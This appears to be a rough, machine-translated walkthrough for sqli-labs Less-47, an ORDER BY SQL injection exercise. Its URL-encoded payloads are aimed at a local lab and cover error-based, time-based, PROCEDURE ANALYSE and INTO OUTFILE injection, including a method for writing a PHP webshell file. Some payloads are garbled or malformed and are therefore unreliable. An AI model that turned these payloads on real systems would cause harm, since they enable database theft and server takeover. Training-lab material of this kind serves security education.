Sqli-labs less 47

Less-47

The SQL statement for this is $sql = "SELECT * from the users order by ' $id '";

The ID is converted into a character type, so according to the knowledge we mentioned above, we still classify it according to the injected location.

1. , the parameter after order by

   We can only use and to do error and delay injection. We give a few payload examples below.

   ①and Rand is combined in a way that Payload:http://127.0.0.1/sqli-labs/less-47/index.php?sort=1%27and%20rand (ASCII (left (), 1)) =115)--+

   After switching to 116, Http://127.0.0.1/sqli-labs/Less-47/index.php?sort=1%27and%20rand (ASCII (Left (database (), 1)) =116)--+

   There are still problems in the later tests here, and we cannot use this method for accurate injection. Left here is just an example.

   ② can be used in the form of error

   HTTP://127.0.0.1/SQLI-LABS/LESS-47/?SORT=1%27AND%20 (Select%20count (*)%20from%20information_schema.columns% 20group%20by%20concat (0x3a,0x3a, (Select%20user ()), 0x3a,0x3a,floor (rand ()))--+

   You can see the contents of User (), and you can construct additional statements to inject.

   Here is an error injection, the principle and the above payload is the same, are using the principle of MySQL duplicates.

   Http://127.0.0.1/sqli-labs/Less-47/?sort=1%27and%20 (Select%20*%20from%20 (Select%20name_const (Version (), 1), NAME _const (Version (), 1)) x)--+

   Version () is repeated here, so it bursts

   ③ Delay Injection

   Http://127.0.0.1/sqli-labs/Less-47/?sort=1%27and%20If (ASCII (substr () (Database (),) =115,0,sleep (5))--+

   Because the database () is security, so the first letter of the S ASCII is 115, here directly, when changed to 116 or other numbers, it is time to delay, we do not show the map, can be scripted blasting.

   (2) Procedure analyse parameter after injection

   Using the procedure analyse parameter, we can perform an error injection. At the same time, there can be a limit parameter between procedure analyse and order by, and in practice we may also have a limit injection, which can be injected using procedure analyse.

   The following is a sample example

   Http://127.0.0.1/sqli-labs/Less-47/?sort=1%27procedure%20analyse (Extractvalue (rand (), concat (0x3a,version ())), 1 )--+

3. Import export file into outfile parameter

   http://127.0.0.1/sqllib/less-47/?sort=1%27into%20outfile%20%22c:\\wamp\\www\\sqllib\\test.txt%22--+

   Import query results into a file

   At this time we can consider uploading the Web horse, using lines terminated by.

   into Outtfile c:\\wamp\\www\\sqllib\\test1.txt lines terminated by 0x (web horse for 16 binary conversion)

   http://127.0.0.1/sqllib/less-47/?sort=1%27into%20outfile%20%22c:\\wamp\\www\\sqllib\\test.php%22lines% 20terminated%20by%200x3c3f70687020706870696e666f28293b3f3e2020--+

   The 16 binary files here are <?php phpinfo ();? >

   We visit test.php

Sqli-labs less 47